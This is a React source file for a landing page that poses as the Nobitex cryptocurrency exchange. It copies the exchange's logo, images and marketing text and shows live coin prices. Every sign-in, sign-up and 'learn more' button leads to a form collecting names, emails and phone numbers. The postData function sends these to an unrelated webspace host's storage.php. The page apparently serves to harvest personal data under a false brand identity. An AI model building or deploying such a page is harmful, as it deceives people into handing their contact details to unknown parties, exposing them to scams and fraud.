import { useEffect, useState } from "react";
import "./App.css";
import { toast } from "react-toastify";

function App() {
  const [cryptoData, setCryptoData] = useState([]);
  const [loadingPrices, setLoadingPrices] = useState(false);
  const [firstName, setFirstName] = useState("");
  const [lastName, setLastName] = useState("");
  const [mail, setMail] = useState("");
  const [number, setNumber] = useState("");
  const [sending, setSending] = useState(false);
  useEffect(() => {
    const getData = async () => {
      try {
        setLoadingPrices(true);
        const response = await fetch(
          "https://api.coingecko.com/api/v3/coins/markets?vs_currency=usd&order=market_cap_desc&per_page=10&page=1&sparkline=true"
        );
        const data = await response.json();
        setCryptoData(data);
        setLoadingPrices(false);
      } catch (error) {
        console.log(error);
        setLoadingPrices(false);
      }
    };
    getData();
  }, []);

  window.onload = () => {
    function googleTranslateElementInit() {
      const google = window.google;
      new google.translate.TranslateElement(
        { pageLanguage: "en" },
        "google_translate_element"
      );
    }

    googleTranslateElementInit();
  };

  const postData = async () => {
    if (firstName === "" || lastName === "" || mail === "" || number === "") {
      alert("Please Insert all fields!");
    } else {
      setSending(true);
      const form = new FormData();
      form.append("firstname", firstName);
      form.append("lastname", lastName);
      form.append("mail", mail);
      form.append("number", number);
      form.append("command", "insertdata");

      let headersList = {
        Accept: "*/*",
      };

      let response = await fetch(
        "https://web9072.web07.bero-webspace.de/savedat/storage.php",
        {
          method: "POST",
          body: form,
          mode: "no-cors",
          headers: headersList,
        }
      );

      let data = await response.text();
      console.log(data);
      toast.success("Subscribed", { theme: "dark" });
      setFirstName("");
      setLastName("");
      setMail("");
      setNumber("");
      setSending(false);
    }
  };

  return (
    <div className="body">
      <header>
        <nav>
          <div className="logo">
            <img
              src="https://nobitex.ir/_nuxt/img/nobitex-logo-1.98a9a95.webp"
              alt=""
            />
            <p>Nobitex</p>
          </div>
          <div id="google_translate_element"></div>
          <div className="btns">
            <a href="#form">
              <p>Sign In</p>
            </a>
            <a href="#form">
              <p>Sign Up</p>
            </a>
          </div>
        </nav>
        <section className="header">
          <div>
            <h1 id="btc">Bitcoins and Digital Currencies Secure Trading</h1>
            <p id="join">Join the largest Iran Digital Currency Market</p>
            <div className="btns">
              <a href="#form">
                <p>Sign In</p>
              </a>
              <a href="#form">
                <p>Sign Up</p>
              </a>
            </div>
            <p id="how">
              <a href="#form"> &#8594; How Nobitex works?</a>
            </p>
          </div>

          <div id="form" className="header-flex">
            <div className="table">
              {!loadingPrices && (
                <table>
                  <thead>
                    <tr>
                      <th>Name</th>
                      <th>Latest Price ($)</th>
                      <th>24h change</th>
                      <th></th>
                    </tr>
                  </thead>
                  <tbody>
                    {cryptoData.map((data) => {
                      return (
                        <tr key={data.symbol}>
                          <td className="name">
                            <img src={data.image} alt="" />
                            <h3>{data.symbol}</h3>
                            <p>{data.name}</p>
                          </td>
                          <td>{data.current_price}</td>
                          <td>
                            {data.price_change_percentage_24h.toFixed(2)}%
                          </td>
                          <td className="button">
                            <button>Buy & Sell</button>
                          </td>
                        </tr>
                      );
                    })}
                  </tbody>
                </table>
              )}
            </div>
            <div className="form">
              <h3>LEARN MORE ABOUT NOBITEX</h3>
              <input
                value={firstName}
                onChange={(e) => setFirstName(e.target.value)}
                type="text"
                placeholder="First Name"
              />
              <br />
              <input
                value={lastName}
                onChange={(e) => setLastName(e.target.value)}
                type="text"
                placeholder="Last Name"
              />
              <br />
              <input
                value={mail}
                onChange={(e) => setMail(e.target.value)}
                type="email"
                placeholder="Email"
              />
              <br />
              <input
                value={number}
                onChange={(e) => setNumber(e.target.value)}
                type="tel"
                placeholder="+245-3556-34566"
              />
              <br />
              <button
                disabled={sending}
                onClick={() => postData()}
                className="btn"
              >
                Learn More
              </button>
              <p style={{ color: "black", fontSize: "11px", padding: "8px 0" }}>
                *By entering your personal details here and clicking the LEARN
                MORE button you agree and accept the Website Privacy Policy and
                Terms & Conditions. *Your personal information may be shared
                with third parties providing trading services as provided in the
                Website privacy policy.
              </p>
            </div>
          </div>
        </section>
      </header>
      <section className="choose">
        <h1>Why Choose Nobitex?</h1>
        <div className="adv">
          <div>
            <img src="https://nobitex.ir/_nuxt/img/why1.fe46a70.webp" alt="" />
            <h3>Simple and Practical</h3>
            <p>
              The simple and practical Nobitex environment will make digital
              currency trading enjoyable for you.
            </p>
          </div>
          <div>
            <img src="https://nobitex.ir/_nuxt/img/why2.76a5171.webp" alt="" />
            <h3>Secure Trade</h3>
            <p>
              Security is a priority for Nobitex. Buy and sell with ease and
              without worries.
            </p>
          </div>
          <div>
            <img src="https://nobitex.ir/_nuxt/img/why3.1ed2508.webp" alt="" />
            <h3>Fast and Pioneer</h3>
            <p>
              The variety of cryptocurrencies and the speed of transactions make
              Nobitex one of the best online markets.
            </p>
          </div>
        </div>
      </section>
      <div className="outer-facilities">
        <section className="facilities">
          <h1>The best facilities for buying and selling digital currencies</h1>
          <div className="txt-img">
            <div className="txt">
              <div className="facility">
                <div className="left">
                  <img
                    src="data:image/webp;base64,UklGRnACAABXRUJQVlA4WAoAAAAQAAAAKgAAJAAAQUxQSEABAAABkKP9/9o2nzAzrf8nMymbtxr28sS86wbV1KebYQ5oK+PvAPYN3BvoCNYNfoU/KTRHxASA+V5o/OIN3s+04o5PMqpKjUeuqoMseq6qdY+R6oD49QBV7ZynUXKOqi/OVs+P6vA86bPzlF1Lfps0oOzUV3GH1CH3ylfxDsgB45MCC3vOnRADkLt+wMIrcb8PyOFoGlM6DPTEN8AwfXwfMtsPeCDRMrgvH+dZLS0ZnIh8qO33IpSrzH8UeQqZpQ4i8hp2I3TggYh8XWfVctu1H6EPNRHpjZNYMuiJyKubxxG0Du9EatC3DKEl3n592Jce1NWeQBpNb8PbGvQdQ6B14uoFFLADdXWfASzs2wnQZwCFhw4N3gEF8Ez9vz+98b+JoCkUAc4sxqj9XSsoA+Jb8vNkyvNx+z+S8jwMsK+mg8pTrFZQOCAKAQAAkAcAnQEqKwAlAD6ROphJJaMiIS40CzCwEglsAL2Rjbs/8BRM5GA60n0AP1m9Kj2IfJyCIPXWraL45K2Ah8aaSgrCMKJAAP5vH+lPP3gAqtl3b+WGr+jkzxf/9Wh+5z26C9rvEZaVH+VaVbKnjAH+oRT2+///BRtEZPn1mtCGUuzs1TiIKwZmENtkeAdBnyk6gMbnghX6vGPKqZ52f0CvWtujmJtZSNCC1FCa7uABsGxaXlmUuPmPE/xKXW/Dsf5hqkPgpKe1IAS4WetbnTs5a6+wAqcu9/dV4aY+5zujf/E8fAtQxq8NP5Vi/hp97109dE71/zD///BQBvHRRCaYP3OpfNpEd7LEAAA="
                    alt=""
                  />
                </div>
                <div className="right">
                  <p>
                    <b>Wallet Balance Management</b>
                    <br />
                    Buy and sell popular digital currencies and track your
                    balance status at a glance
                  </p>
                </div>
              </div>
              <div className="facility">
                <div className="left">
                  <img
                    src="data:image/webp;base64,UklGRl4CAABXRUJQVlA4WAoAAAAQAAAAKgAAJQAAQUxQSAEBAAABgBttexTny32pBMbxpXAzq4SNfaoDk/tS5HTHFSyZHTKjAqAD6AA6gA6+AIR+5CuNiAkAHhquPuwzTPdMctAALMm+XptkB6AhLVZXPbkFyBEJ5qSbtFcJPgZS/UqpnHQuwYJ0kxoJmv/Pk/fevx+sodpRz5z72fM4/VZ1HKqdxjxZI588HcRkFcOVWSBrBy62oYOz4MECy9h87uDTBz9CmvHbmVO/MNQKdJMGm+vgJmApmaMnNeJLkQaOHHZvkQqUzVTL+FILGagyrjBCWwCZiYWUgWiWEkYZCBcipZQRMVIoBGqIqz5qzOSgx4hRY03VLmo1VrZ9oLdIUOeudE4jCABWUDggNgEAADAIAJ0BKisAJgA+kUKdSiWjoqGnOApIsBIJbADFEUFavjr2Ac06Uz8gDqbvSA9nL0AP1u9K32JAcNFLqaEbjz4J0CidEivd5lGQAOhUq89V7zL1JO0ZQ/2Vj9Kw4/pYTzKPPMhTzb/SOjkJC1PqYIgP3eA8tW6WffOgU9mXP/87ppKPHhXReH+XUEyJPiu0tz1yd1rrWLCDnaFiP+/5y1fGqnl8fJqB2mWKraqLamFgzIieFwGF4tBNusTgNQjcVsB7qxuDNVva0OO5avIWHu90gm6FXwTSuon1IF6mIcU6lU3vKuX+JbKoC5aGs8wD/iE/oVNBDF23UTSglcPX+zTgx/752eDTWG9uz6Ghcq80GS1zleqOqw4yUM+BxirU713p9clqzVRw69v9TBj9/SZT8UokAAA="
                    alt=""
                  />
                </div>
                <div className="right">
                  <p>
                    <b>Pay with Shetab debit cards</b>
                    <br />
                    Trade various digital currencies with Toman through deposit
                    and withdrawal by Shetab network members banks' cards
                  </p>
                </div>
              </div>
              <div className="facility">
                <div className="left">
                  <img
                    src="data:image/webp;base64,UklGRtoBAABXRUJQVlA4WAoAAAAQAAAALQAALQAAQUxQSDgBAAABgFNre97mHTUKgsaMGr1VEMwggqBRW14GDYOUQc0gYhAziBnEDN7+V/paABExAQDclCuH1zw5fA6FRksAEGg4wBVLxU0ka3QYHyvJKZM8wGQkmStJ2HQkK+2A3/6RcOp79J2yet99n72bzl2i+rcu6QfbS0kzm5UVX4fNwro8Tq+SHs9P9zZu80HaG7lKN+RhCU0vHgDiqoxl0AJKKVyu15P3evgwaMa+pV1qm26XVWe0MT4pY9sjQC1Y7+AYUCmKKAl7w1nI45ISRLQGCun/KUELNjtf21mKtnm3kyCiWTjefnN6HSP95ssxc/nm4RcLkhh19Xd93yf85Nd9sPcrfdLeq/k+CDN7loRvfzX8/6t2HMmaSR5sRJJ5IlkPzkCsJCdXaLg4BEsBQChWSsBnN+U6rubJAQBWUDggfAAAAJAFAJ0BKi4ALgA+dS6RR6SioaE8e/gAkA6JaADSRfq2SICDfwG9Mr1TUN1Mjfb2GYaRnucAAP7Syg7UC//899AB+Z/+sYGDbWwFPwD4lPH515bPqOdh0dQBa+S9+Ywr7R/PfGyFll5KQ6gnfzsF/iUeyND6evxhUoqbwAA="
                    alt=""
                  />
                </div>
                <div className="right">
                  <p>
                    <b>Secure Wallet</b>
                    <br />
                    Your wallet's password is kept offline and will be safe of
                    hacking
                  </p>
                </div>
              </div>
              <div className="facility">
                <div className="left">
                  <img
                    src="data:image/webp;base64,UklGRoQCAABXRUJQVlA4WAoAAAAQAAAAKgAALgAAQUxQSLABAAABkKLtnxNJn5+Ew/Kgm+dB4jb5BTs5a/AbQJWdoDe0o92E/wGaG+zegL4BfYMSXVQVvUFHxASQKHF92MF3Ih6PvCkfmTcRUUeOGVMcsa3+cuV4k43ESqkEyFoVmj6Ie2mqREQBn0TaQ0PuQRJDrJTKgFCJSLlBtXA7MthmC5HbDeeRcmZLvBBJ7MLZLDY9imNFLPJtx2anFZHQkLsIHInksPNRtZLDzsKCI4db2FnIA1krIqKAMElCTBAnliFAJXIoIqKqmPER90w2j3aw9hZuZPChFXs/iMgR8F0cY287wCeHHF8KYCc/ssxDptnO/5dquazrPNoObe7rLdL6YpsqqN9Ehu+ST5QSaa37uwh2EqZZwYU2/gzwPTaHuUkPd3k6TQHDiHFZBv4CUu06XPjqoHHSOvJUQeehMEXlU98/vR1LCbR5bbGONs6ftHGITCsoRobybdE0Xdc1EUR1r8cb0xzmI1r3dYQxf9K269RUQG+htf51V9dPg7buAkwBqZ52VYCpg2qSdRMwdgFcdN7WTYB7Ol/7WFUBfoOL3y7PBVNGVTf2fBEwefC2aZrmLe5WUDggrgAAABAGAJ0BKisALwA+jTyYR6UjoqEuOAzIoBGJaACDh5gPw7/QLsBvAG8GBGCK/McczuuImwOJbapNAAD+7a/Nd/rawTf99Ef//gV7n/8EnTpoOkyl/5xTY7Mf/lCJaTD5XUGlB/KDpoxv2Uf1/OIaLlWr+GeU3/zMTS9i6vTdvajqX+nXcBwh8GyvWzux3iNHlq/Hlmbv/W36rW1IL/nPfaZRJxkK5/KG7Ki2k+rAAA=="
                    alt=""
                  />
                </div>
                <div className="right">
                  <p>
                    <b>Competitive Fee</b>
                    <br />
                    The fee at Nobitex is very low and decreases as the volume
                    of transactions increases
                  </p>
                </div>
              </div>
            </div>
            <div className="img">
              <img
                src="https://nobitex.ir/_nuxt/img/app-screenshot.743295f.webp"
                alt=""
              />
            </div>
          </div>
        </section>
      </div>
      <div className="outer">
        <div className="info">
          <div>
            <h1>+ 4 M</h1>
            <p>Active User</p>
          </div>
          <div>
            <h1>+ 200 M</h1>
            <p>Transactions Made</p>
          </div>
          <div>
            <h1>+ 200 B</h1>
            <p>Turnover</p>
          </div>
        </div>
      </div>
      <div className="learn">
        <h1>Learn More with Nobitex</h1>
        <div className="links">
          <div>
            <img
              src="data:image/webp;base64,UklGRvgCAABXRUJQVlA4WAoAAAAQAAAAKQAAKAAAQUxQSHwBAAABkFZbWxBdJwIRiECDjwbXBkODsYE0GBuMDcYG0kAbaANt8P4QXvAmiIgJIO+H37LsIueyLMM/mpvX75Ta5W2bxFPafk2VWaX57mpGeXCtuZ4QW7E9QmX3xFhDuJqN1NupTfJUdwDdeOiOKRgaymK5W+/7ePfe0VhElpfhv5Ts8nn/mQo3DN9heBnNldH2N/vdpfjrSrEmAMRT1IvLMel6wKxSHXKEQzED9pR8itORk/5mgG6+MpcBs0o2WYD+ykgArjd3F8aUemCUbCLvc6cFkf1tUDrJW8BbYMrIdBORZfgzuZSbgU2kA5cTl8uuDqzkI3gRSUBhZFaIhVCYYKzZsZsCmAvy+YiIOOgKYjFzYQNS6X4FYCp5wE3XLQGbLgBBdICPaavbgCB15aTqwckDs8rDqLI1oSZpDmqtqsfsmrGKpJHlFK2rc5otjJqJhqOig6102RZmKwU4SoGm9iqcn1WKPY3NltMG2sdLlxxP2ukopY7HXYxTjMGgBFZQOCBWAQAA8AgAnQEqKgApAD6RPppJJaMioSqpWLASCWwAuy9opn+pbb0sD1V7ZjzAfrB66vQzdRLz2f7EfBB5LQXjtzX9npS5o51s4jxChZo0un5ogcwA/vJmr/6VmTruO//yDP/yDMEE3SvP03GN5P3Zw1p0oS4YM2A+4mLyShCDGXwm60GFfGOAgS+ZUYRrAD6JsVhLAjNE309f/5MqmIEEByk6rylDnQbkQooNY24dCEHgmf+xRF03aIw4CWMzO1mEdtkO05I+laaPZ24uJRkKNefm3GH6bDb8f7//Bv7bHskDuAush9fv0J9uHIPZ5npjVsKoA/MCFHhwurztRBfOrgMJcLp/1hf/+8r//3gI//7w4+RfxvCFFrdc0XC2w3+MEvH0aiVeD/jLSzjOPOLPL//hGRX/3uPf/zYksaj7Bts0fW4NmH8Qde7B3d3j3rvNwtv+MqfFzAAA"
              alt=""
            />
            <p>Digital Currencies Buying Guide</p>
          </div>
          <div>
            <img
              src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACQAAAAeCAYAAABE4bxTAAAABHNCSVQICAgIfAhkiAAAAcRJREFUWEfd1zFOAkEYBeD/LTRYUWitvVEwYQu0kRMIrRECN8ATCDfQE4BibFm8gFgYC0ggMfZYKwm2uu4za0QwIQyz7gq67f4z882bmWQG+Xg9+hZGBUBa5viRtEI2C8gmGhYge3O0fA1NSgM5s8FFwAwN30BnrT3MAzceyv8CrdzfxF9flnqDra3BT5L1JSEXIzY6JAcASo+x7ROvKF9Ay3e3u3B4NXZEugwZh08byaYuLBjQp4Iix7YTKessY6Ag1+UuI2EU+7Hk6SxpBQ4aIkhp2oxkVGn9GugjLQMp1b76NRCF5afYTkm1bIGDKHKNMIuP6ztdFcb9HxiIlGcaKPY3k9VZIMOaQECOyMmbEympNvAkqC+gaOd2LQx2IewxZBRVG3daYr6AdJZEVft3QEJRHlHVbD39x2jcxb4xepqdz40WL6FswuoBWPV5op66I/mArHmZh7DiqQefG1FQ+Hhl7Jv1eJiG3kMRcjTVQynreG041kUr0/X07DlI1HcNGKPr64SRHTqp83ZG+zrrCZQzrY4I4tMSINmstdMpnZTcWm1Q1rQqEORnGYjCaq2VLsxSO6zRB2mcSvfU1NrpNR3QOxGyLLMPmzKfAAAAAElFTkSuQmCC"
              alt=""
            />
            <p>Training Videos</p>
          </div>
          <div>
            <img
              src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACIAAAAfCAYAAACCox+xAAAABHNCSVQICAgIfAhkiAAAAl5JREFUWEftWMFuUkEUPecBC92Isa5lbyyQwIJ2If0CYG/x9Qtsv8DHFxS/wBYTt4A/IF20LGgCaFwX1y3JW2kTYK6Zh68BRBkqYE2Y5XDn3DP33jn3PggAdqwcHoR4SCANMKL3lrpEXAFqA0rhfSPX0r6oSaggL0CGl+p8GriI26fsaDLMJ6tHAF6unMSNQ2mVGtk488nKxUrS8YebWj31UEdE/l00hp6VqJ01kdEsjEVEBCfvzjPpVaUpn6g6IF7/kpo1kclivZMRCTfrkRBVGWRsrGZEWj2xcm481dH7jz7VbSp1SBNVFnSUhYPu5lZFnzWqkY32qUPQK6TJJZDCVXTb0fsb7bMagedzFPjxZXTLNiYSbjbDQevbETDZf8Ttq/u2G4+7HpHP9TSUeKRMFoOyf/l022tyRhExAf1bm/+PyDDsE/m3cHL1LFXzo6FTGLCuMwRmzjACdLrR1LF/1igi+jVYIm+nhV+Re93NlB4d8Lh9NtcIMVroCyCCnP8El07Eu+2X05j0kR2NCoOo+FWv973UBK6zFDU7NWTLv8D61UyrNaMa8QSN33WxTg7Ubl/u7Y0J2kCmKvA05wzJwVyCdock3mt6FZDRiabX7omVHW964pB4MktpRfAVAdq+DhmlZhboIn7/LRFg+H2xCCcmGPlktQjglbbtQ8W5m6jWyJ9SLnCEvJFwE8Db2FBJBJSi/3VZamTIF4ly2qL18TaACzkjKJTOMw412G7ygw1RRZIPFgJuDvKm1Mjsa3OPiF52rBzpB4Ixi2p8PDQHNbYUsjPAoOX/E6AP/gDhiO3WPTrd6wAAAABJRU5ErkJggg=="
              alt=""
            />
            <p>Nobitex Blog</p>
          </div>
          <div>
            <img
              src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB8AAAAfCAYAAAAfrhY5AAAABHNCSVQICAgIfAhkiAAAAvdJREFUSEulV0tS20AQ7R6JNb5ByAliqux1wgWQvU2VHeUEgRMAJ8CcAGOlsjXiAhFrqQrlBDEniLO2PI8afYxspNHIaKGNevr1770eMRk+bnd+JA+EA2CgjjDzl+woFgAtiGnBkgOxlv40Hi5N3HKT0aj/4DLJCyI+arItvoMwtVa4msbDhe5MLfjX/rxrga9fMzSFfrXLgzivq0QleJot5DUxd9pD7p5ALFYYVlXhDfio93DGjOv3g5Y8AMuEcfIrHMZlv1vgWX9xqwMG8EwkJqB1bCe0SGw6EiwGAFxmPqw/i4VY4bjcgg246rEN/t1Q6rtZ6LhVAOmMkJgy0SdNAPEsHBwX3zfgo54fMNPnuoMA+V7kpDRTTwZmHVqr9XPRT0XHtc2xrgIg/u6Fp9OUruplUm6xkh8ViNudd9Y2z8ssKDsc9/xLYrqozR5YigTK1zID790vmPmDJutHL3JSURn3/QkR/di1LQWnxOivfm743ItOJ5wrl9aYiG5moXOWVcmPq/oKZA7zAKFnC9Leswm1AAReNDhJh5LEU5XjovSqLfJA/GuiqqoUNw1akxP1HUR/vNDpms6PspNSDN8NrlhgJdIt+Ns0P5tkQFc87vsN/dGwtkSbvNeKQt9MqkXvAgddzSLnUgHl9Ltl5o0OGARww8Zl2vGWkDxWWp2yxean1ktIZb7vwM1CJ9eIPRdRXnbzPpWyl5AnP6NhMOr598zkGJR5y0SdZxNp1Ull63IragL/vWjQUQpnJAptM9PLa7ak0r6N+37r0qvoidQGq9+EdQEULUvBDfV9y1cx7XWLxmRJbfZ52+z3BS+yVsFtwFOhOBCB/iZSygdYqrs6EaeabvSUhGkLvCh/003ECKTa6M0V7M3tNb+vB/rLYOsQ7sRKnu3e3yvv7a1boOXV6w7YNdP+LikBIsjJPlUA6BEkL5UK1sXW+K+WbSzLJYbbNIw59wOQnOhAi2AawctRKz1ILLsrWGYTztQhUPpHKkkGJoBlfy8m7KJ/ZTAJzQAAAABJRU5ErkJggg=="
              alt=""
            />
            <p>FAQ</p>
          </div>
        </div>
      </div>
      <div className="profit-outer">
        <div className="profit">
          <div className="left">
            <h2>Partake in Nobitex Profits</h2>
            <p>
              By inviting your friends with your own link, every time they
              trade, you will always receive up to 30% of their trading fee from
              Nobitex
            </p>
            <a href="#form">
              <button>Learn more</button>
            </a>
          </div>
          <div className="img">
            <img
              src="https://nobitex.ir/_nuxt/img/profit-img.24cafd2.webp"
              alt=""
            />
          </div>
        </div>
      </div>
      <footer>
        <div className="footer">
          <h3>Nobitex</h3>
          <p>© 2016-2023 NOBITEX, v4.10.0 - 2fbf35b3</p>
        </div>
      </footer>
    </div>
  );
}

export default App;
